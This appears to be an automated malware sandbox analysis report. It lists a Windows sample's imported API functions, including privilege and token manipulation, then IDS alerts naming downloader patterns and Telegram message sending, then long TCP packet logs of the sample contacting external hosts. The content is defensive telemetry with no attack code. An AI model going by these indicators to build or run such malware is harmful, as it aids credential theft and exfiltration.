GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T23:44:11.833778+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:12.740058+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:13.314218+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49733 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:13.974425+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:15.177541+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49736 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:15.771851+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49737 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:18.167719+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49742 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:21.863717+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49753 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:22.751745+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49754 | 149.154.167.220 | 443 | TCP
2025-01-10T23:44:27.333823+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49755 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:28.240064+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49755 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:28.800937+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49757 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:29.427855+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49758 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:30.599431+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49760 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:31.182244+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49761 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:31.818323+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49762 | 158.101.44.242 | 80 | TCP
2025-01-10T23:44:33.684415+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49765 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:34.928756+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49767 | 104.21.16.1 | 443 | TCP
2025-01-10T23:44:38.256299+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49772 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 23:44:10.982691050 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:10.987607956 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:10.988126993 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:10.988344908 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:10.993225098 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:11.597074986 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:11.612184048 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:11.617144108 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:11.780548096 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:11.833777905 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:11.839123964 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:11.839158058 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:11.839224100 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:11.849261045 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:11.849280119 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.339402914 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.339524984 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.344980955 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.344991922 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.345412016 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.396266937 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.404607058 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.451330900 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.517551899 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.517646074 CET | 443 | 49732 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.517693996 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.524317980 CET | 49732 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.527944088 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:12.532826900 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:12.688503027 CET | 80 | 49731 | 158.101.44.242 | 192.168.2.4
Jan 10, 2025 23:44:12.691349983 CET | 49733 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.691431999 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.691533089 CET | 49733 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.691818953 CET | 49733 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:12.691840887 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:12.740057945 CET | 49731 | 80 | 192.168.2.4 | 158.101.44.242
Jan 10, 2025 23:44:13.153944016 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:13.158582926 CET | 49733 | 443 | 192.168.2.4 | 104.21.16.1
Jan 10, 2025 23:44:13.158611059 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:13.314260960 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:13.314409018 CET | 443 | 49733 | 104.21.16.1 | 192.168.2.4
Jan 10, 2025 23:44:13.314500093 CET | 49733 | 443 | 192.168.2.4 | 104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.314896107 CET49733443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.317883968 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.319951057 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.322943926 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.323026896 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.324770927 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.324860096 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.324970007 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:13.329773903 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.918745041 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.922652960 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.922714949 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.922910929 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.923125982 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:13.923139095 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:13.974425077 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.403554916 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.405806065 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.405839920 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536107063 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536283970 CET44349735104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.536358118 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.536947966 CET49735443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:14.540985107 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.542486906 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.545895100 CET8049734158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.545984983 CET4973480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.547333002 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:14.547435045 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.547512054 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:14.552254915 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.134408951 CET8049736158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.137466908 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.137512922 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.137589931 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.138150930 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.138164997 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.177541018 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.614564896 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.621380091 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.621416092 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.771881104 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.771979094 CET44349737104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.772037983 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.772397041 CET49737443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:15.776487112 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.781368017 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:15.782332897 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.782411098 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:15.787178993 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.351823092 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.355897903 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.355995893 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.356081963 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.356292963 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.356328011 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.396286964 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.818773031 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.820596933 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.820653915 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965533972 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965636015 CET44349739104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.965714931 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.966084003 CET49739443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:16.969165087 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.970088959 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.974174023 CET8049738158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.974509954 CET4973880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.974982023 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:16.975059986 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.975142956 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:16.979990959 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.535942078 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.537470102 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537511110 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.537583113 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537857056 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:17.537869930 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:17.583911896 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.021277905 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.028069973 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.028110981 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.167799950 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.167965889 CET44349742104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.168028116 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.175358057 CET49742443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.203916073 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.209291935 CET8049740158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.209379911 CET4974080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.211221933 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.216190100 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.216274977 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.225591898 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:18.230447054 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.808058977 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.809437990 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809533119 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.809617996 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809890985 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:18.809926033 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:18.849414110 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.285635948 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.296621084 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.296689987 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419579983 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419646978 CET44349746104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.419713974 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.420320988 CET49746443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:19.424837112 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.428260088 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.429930925 CET8049743158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.430022001 CET4974380192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.433120012 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:19.433190107 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.433346033 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:19.438205957 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.000343084 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.001533985 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001575947 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.001635075 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001844883 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.001853943 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.052537918 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.458208084 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.461386919 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.461402893 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605245113 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605340958 CET44349750104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.605397940 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.606009960 CET49750443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:20.608861923 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.609623909 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.613873959 CET8049748158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.613940954 CET4974880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.614423990 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:20.614511013 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.614590883 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:20.619360924 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.237056017 CET8049752158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.238229036 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238368034 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.238435984 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238693953 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.238722086 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.286942959 CET4975280192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:21.728106976 CET44349753104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.738248110 CET49753443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:21.738280058 CET44349753104.21.16.1192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 10, 2025 23:44:21.863594055 CET  443          49753      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:21.863655090 CET  443          49753      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:21.863709927 CET  49753        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:21.864275932 CET  49753        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:21.881411076 CET  49752        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:21.886356115 CET  80           49752      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:21.886420012 CET  49752        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:21.889020920 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:21.889067888 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:21.889203072 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:21.889774084 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:21.889786959 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.510152102 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.510236025 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:22.514420986 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:22.514436960 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.514801979 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.516391993 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:22.563334942 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.751764059 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.751847982 CET  443          49754      149.154.167.220  192.168.2.4
Jan 10, 2025 23:44:22.752206087 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:22.757230997 CET  49754        443        192.168.2.4      149.154.167.220
Jan 10, 2025 23:44:26.315267086 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:26.320487022 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:26.320600986 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:26.332545042 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:26.337563992 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:26.912889957 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:26.916616917 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:26.921596050 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:27.292238951 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:27.333822966 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:27.364097118 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.364156008 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:27.364209890 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.369434118 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.369467020 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:27.824695110 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:27.824812889 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.826342106 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.826355934 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:27.826808929 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:27.880794048 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.895138025 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:27.935338974 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.014538050 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.014599085 CET  443          49756      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.014673948 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.020018101 CET  49756        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.038208008 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.043092012 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:28.192877054 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:28.196911097 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.196966887 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.197072029 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.197350979 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.197370052 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.240063906 CET  49755        80         192.168.2.4      158.101.44.242
